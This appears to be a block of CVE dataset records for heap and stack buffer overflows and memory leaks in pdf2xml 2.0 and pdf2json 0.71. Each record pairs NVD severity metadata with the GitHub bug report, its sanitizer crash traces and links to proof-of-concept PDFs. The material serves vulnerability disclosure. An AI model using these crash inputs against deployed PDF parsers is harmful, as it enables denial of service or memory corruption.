void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310 #7 0x45740d in PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/PDFDoc.cc:398 #8 0x407de8 in PDFDocXrce::displayPages(OutputDev*, _xmlNode*, int, int, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/src/PDFDocXrce.cc:34 #9 0x40943b in main /home/test/pdf2xml_analysis/pdf2xml/src/pdftoxml.cc:409 #10 0x7fb7e321182f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #11 0x403d28 in _start (/home/test/pdf2xml_analysis/pdf2xml/pdf2xml+0x403d28) 0x60200004405a is located 0 bytes to the right of 10-byte region [0x602000044050,0x60200004405a) allocated by thread T0 here: #0 0x7fb7e4774602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x416b22 in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1652 #2 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155 #3 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591 #4 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __interceptor_vsprintf Shadow bytes around the buggy address: 0x0c04800007b0: fa fa 00 fa fa fa 00 02 fa fa 00 fa fa fa 00 00 0x0c04800007c0: fa fa 00 fa fa fa fd fa fa fa 00 fa fa fa 00 00 0x0c04800007d0: fa fa fd fa fa fa fd fd fa fa 06 fa fa fa 03 fa 0x0c04800007e0: fa fa fd fd fa fa fd fa fa fa fd fd fa fa 06 fa 0x0c04800007f0: fa fa 04 fa fa fa fd fd fa fa fd fa fa fa fd fd =>0x0c0480000800: fa fa 06 fa fa fa 05 fa fa fa 00[02]fa fa 00 fa 0x0c0480000810: fa fa fd fa fa fa 00 fa fa fa fd fa fa fa fd fa 0x0c0480000820: fa fa fd fa fa fa fd fa fa fa fd fa fa fa 05 fa 0x0c0480000830: fa fa 07 fa fa fa 00 fa fa fa 02 fa fa fa 00 fa 0x0c0480000840: fa fa 02 fa fa fa 02 fa fa fa 00 fa fa fa 02 fa 0x0c0480000850: fa fa 00 fa fa fa 02 fa fa fa 02 fa fa fa 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==36659==ABORTING [01-Heap-buffer-overflow-TextPage-dump.pdf](https://github.com/kermitt2/pdf2xml/files/4876401/01-Heap-buffer-overflow-TextPage-dump.pdf) ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml
Heap-buffer-overflow-TextPage-dump
https://api.github.com/repos/kermitt2/pdf2xml/issues/11/comments
0
2020-07-06T01:58:25Z
2020-07-06T01:58:52Z
https://github.com/kermitt2/pdf2xml/issues/11
651,196,717
11
2,773
CVE-2020-23874
2021-11-10T22:15:09.370
pdf2xml v2.0 was discovered to contain a heap-buffer overflow in the function TextPage::addAttributsNode.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdf2xml/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://cwe.mitre.org/data/definitions/122.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdf2xml/issues/12" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/kermitt2/pdf2xml/issues/12
[ "Exploit", "Third Party Advisory" ]
github.com
[ "kermitt2", "pdf2xml" ]
$ ./pdf2xml 02-Heap-buffer-overflow-addAttributsNode.pdf test.xml ================================================================= ==57105==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200004999a at pc 0x7f0869e219f5 bp 0x7fffaa6b3610 sp 0x7fffaa6b2da0 WRITE of size 12 at 0x60200004999a thread T0 #0 0x7f0869e219f4 in __interceptor_vsprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x619f4) #1 0x7f0869e21cc9 in __interceptor_sprintf (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x61cc9) #2 0x414e3d in TextPage::addAttributsNode(_xmlNode*, TextWord*, double&, double&, double&, double&, double&, double&) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1423 #3 0x417c7c in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1815 #4 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155 #5 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591 #6 0x45633a in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:394 #7 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310 #8 0x45740d in PDFDoc::displayPages(OutputDev*, int, int, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/PDFDoc.cc:398 #9 0x407de8 in PDFDocXrce::displayPages(OutputDev*, _xmlNode*, int, int, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/src/PDFDocXrce.cc:34 #10 0x40943b in main /home/test/pdf2xml_analysis/pdf2xml/src/pdftoxml.cc:409 #11 0x7f08688f582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #12 0x403d28 in _start (/home/test/pdf2xml_analysis/pdf2xml/pdf2xml+0x403d28) 0x60200004999a is located 0 bytes to the right of 10-byte region [0x602000049990,0x60200004999a) allocated by thread T0 here: #0 0x7f0869e58602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x4148c4 in TextPage::addAttributsNode(_xmlNode*, TextWord*, double&, double&, double&, double&, double&, double&) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1389 #2 0x417c7c in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1815 #3 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155 #4 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591 #5 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __interceptor_vsprintf Shadow bytes around the buggy address: 0x0c04800012e0: fa fa 00 fa fa fa 00 03 fa fa fd fa fa fa fd fd 0x0c04800012f0: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fd 0x0c0480001300: fa fa 00 fa fa fa 00 00 fa fa 02 fa fa fa 00 02 0x0c0480001310: fa fa 03 fa fa fa 07 fa fa fa 03 fa fa fa 05 fa 0x0c0480001320: fa fa 04 fa fa fa 06 fa fa fa 04 fa fa fa 00 01 =>0x0c0480001330: fa fa 00[02]fa fa 00 fa fa fa 00 02 fa fa 00 fa 0x0c0480001340: fa fa 00 00 fa fa 00 fa fa fa fd fa fa fa 00 fa 0x0c0480001350: fa fa 00 00 fa fa 00 fa fa fa 00 00 fa fa 06 fa 0x0c0480001360: fa fa 03 fa fa fa fd fd fa fa fd fa fa fa fd fd 0x0c0480001370: fa fa 06 fa fa fa 04 fa fa fa fd fd fa fa fd fa 0x0c0480001380: fa fa fd fd fa fa 06 fa fa fa 05 fa fa fa 00 02 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==57105==ABORTING [02-Heap-buffer-overflow-addAttributsNode.pdf](https://github.com/kermitt2/pdf2xml/files/4876407/02-Heap-buffer-overflow-addAttributsNode.pdf) ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml
Heap-buffer-overflow-addAttributsNode
https://api.github.com/repos/kermitt2/pdf2xml/issues/12/comments
0
2020-07-06T02:02:32Z
2020-07-06T02:02:32Z
https://github.com/kermitt2/pdf2xml/issues/12
651,197,692
12
2,774
CVE-2020-23876
2021-11-10T22:15:09.447
pdf2xml v2.0 was discovered to contain a memory leak in the function TextPage::testLinkedText.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdf2xml/issues/14" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdf2xml/issues/14" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/kermitt2/pdf2xml/issues/14
[ "Exploit", "Third Party Advisory" ]
github.com
[ "kermitt2", "pdf2xml" ]
$ ./pdf2xml 04-Memory leaks-TextPage-testLinkedText.pdf test.xml ================================================================= ==82085==ERROR: LeakSanitizer: detected memory leaks Direct leak of 99000 byte(s) in 99 object(s) allocated from: #0 0x7f1554619602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x7f1553d2f735 (/usr/lib/x86_64-linux-gnu/libxml2.so.2+0x2e735) Direct leak of 4850 byte(s) in 97 object(s) allocated from: #0 0x7f1554619602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x4156a9 in TextPage::testLinkedText(_xmlNode*, double, double, double, double) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1473 #2 0x41773d in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1764 #3 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155 #4 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591 #5 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310 Direct leak of 3924 byte(s) in 97 object(s) allocated from: #0 0x7f1554619602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x417a6c in TextPage::dump(int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1800 #2 0x428ec5 in XmlOutputDev::endPage() /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4155 #3 0x48e309 in Gfx::~Gfx() /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:591 #4 0x45653e in Page::display(OutputDev*, double, double, int, int, int, int, int (*)(void*), void*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Page.cc:310 Direct leak of 3316 byte(s) in 227 object(s) allocated from: #0 0x7f15545e330f in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x6230f) #1 0x40a476 in TextWord::TextWord(GfxState*, int, int, int, int, double, double, int, TextFontInfo*, double, int, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:212 #2 0x4125fc in TextPage::beginWord(GfxState*, double, double) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1160 #3 0x4128c9 in TextPage::addChar(GfxState*, double, double, double, double, unsigned int, int, unsigned int*, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:1178 #4 0x429048 in XmlOutputDev::drawChar(GfxState*, double, double, double, double, double, double, unsigned int, int, unsigned int*, int) /home/test/pdf2xml_analysis/pdf2xml/src/XmlOutputDev.cc:4172 #5 0x4935b1 in Gfx::doShowText(GString*) /home/test/pdf2xml_analysis/pdf2xml/xpdf/xpdf/Gfx.cc:3646 ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml [04-Memory leaks-TextPage-testLinkedText.pdf](https://github.com/kermitt2/pdf2xml/files/4876577/04-Memory.leaks-TextPage-testLinkedText.pdf)
Memory-leaks-TextPage-testLinkedText
https://api.github.com/repos/kermitt2/pdf2xml/issues/14/comments
0
2020-07-06T03:02:05Z
2020-07-06T03:02:05Z
https://github.com/kermitt2/pdf2xml/issues/14
651,213,773
14
2,775
CVE-2020-23877
2021-11-10T22:15:09.567
pdf2xml v2.0 was discovered to contain a stack buffer overflow in the component getObjectStream.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdf2xml/issues/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/kermitt2/pdf2xml/issues/15" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:science-miner:pdf2xml:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "F0D977B7-4BC0-476D-975B-238D77F69414", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/kermitt2/pdf2xml/issues/15
[ "Exploit", "Third Party Advisory" ]
github.com
[ "kermitt2", "pdf2xml" ]
$ gdb ./pdf2xml (gdb) r 05-Stack-buffer-overflow-XRef-getObjectStream.pdf test.xml [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Syntax Error (593163): Dictionary key must be a name object Syntax Error (593170): Dictionary key must be a name object Program received signal SIGSEGV, Segmentation fault. 0x00007ffff6e8c80b in ?? () from /usr/lib/x86_64-linux-gnu/libasan.so.2 (gdb) x/5i $rip => 0x7ffff6e8c80b: mov %ecx,0x8(%rsp) 0x7ffff6e8c80f: mov %r8d,0x10(%rsp) 0x7ffff6e8c814: mov (%rax),%eax 0x7ffff6e8c816: test %eax,%eax 0x7ffff6e8c818: je 0x7ffff6e8d0a0 ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2xml [05-Stack-buffer-overflow-XRef-getObjectStream.pdf](https://github.com/kermitt2/pdf2xml/files/4876586/05-Stack-buffer-overflow-XRef-getObjectStream.pdf)
Stack-buffer-overflow-XRef-getObjectStream
https://api.github.com/repos/kermitt2/pdf2xml/issues/15/comments
0
2020-07-06T03:05:26Z
2020-07-06T03:05:26Z
https://github.com/kermitt2/pdf2xml/issues/15
651,214,682
15
2,776
CVE-2020-23878
2021-11-10T22:15:09.687
pdf2json v0.71 was discovered to contain a stack buffer overflow in the component XRef::fetch.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2json" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/45" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/Aurorainfinity/Poc/tree/master/pdf2json" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/flexpaper/pdf2json/issues/45" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:flowpaper:pdf2json:0.71:*:*:*:*:*:*:*", "matchCriteriaId": "04335321-68D4-408C-A751-7CBE39D6F9FC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/flexpaper/pdf2json/issues/45
[ "Exploit", "Third Party Advisory" ]
github.com
[ "flexpaper", "pdf2json" ]
$ ./pdf2json 01-Stack-buffer-overflow-XRef-fetch.pdf ASAN:SIGSEGV ================================================================= ==89368==ERROR: AddressSanitizer: stack-overflow on address 0x7ffc9d6bcfe0 (pc 0x7f2cf5cba26e bp 0x000000000018 sp 0x7ffc9d6bcfd0 T0) #0 0x7f2cf5cba26d (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xb026d) #1 0x7f2cf5cb9d67 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0xafd67) #2 0x7f2cf5c2cf4f (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x22f4f) #3 0x7f2cf5ca34fe in operator new(unsigned long) (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x994fe) #4 0x4345c4 in XRef::fetch(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:839 #5 0x434835 in ObjectStream::ObjectStream(XRef*, int) /home/test/pdf2json_tmp/xpdf/XRef.cc:84 #6 0x4345d6 in XRef::fetch(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:839 #7 0x434835 in ObjectStream::ObjectStream(XRef*, int) /home/test/pdf2json_tmp/xpdf/XRef.cc:84 #8 0x4345d6 in XRef::fetch(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:839 #9 0x434835 in ObjectStream::ObjectStream(XRef*, int) /home/test/pdf2json_tmp/xpdf/XRef.cc:84 #10 0x4345d6 in XRef::fetch(int, int, Object*) /home/test/pdf2json_tmp/xpdf/XRef.cc:839 #11 0x434835 in ObjectStream::ObjectStream(XRef*, int) /home/test/pdf2json_tmp/xpdf/XRef.cc:84 ref:https://github.com/Aurorainfinity/Poc/tree/master/pdf2json [01-Stack-buffer-overflow-XRef-fetch.pdf](https://github.com/flexpaper/pdf2json/files/4895938/01-Stack-buffer-overflow-XRef-fetch.pdf)
Stack-buffer-overflow-XRef-fetch
https://api.github.com/repos/flexpaper/pdf2json/issues/45/comments
0
2020-07-09T09:56:14Z
2020-07-09T09:56:14Z
https://github.com/flexpaper/pdf2json/issues/45
653,929,593
45
2,777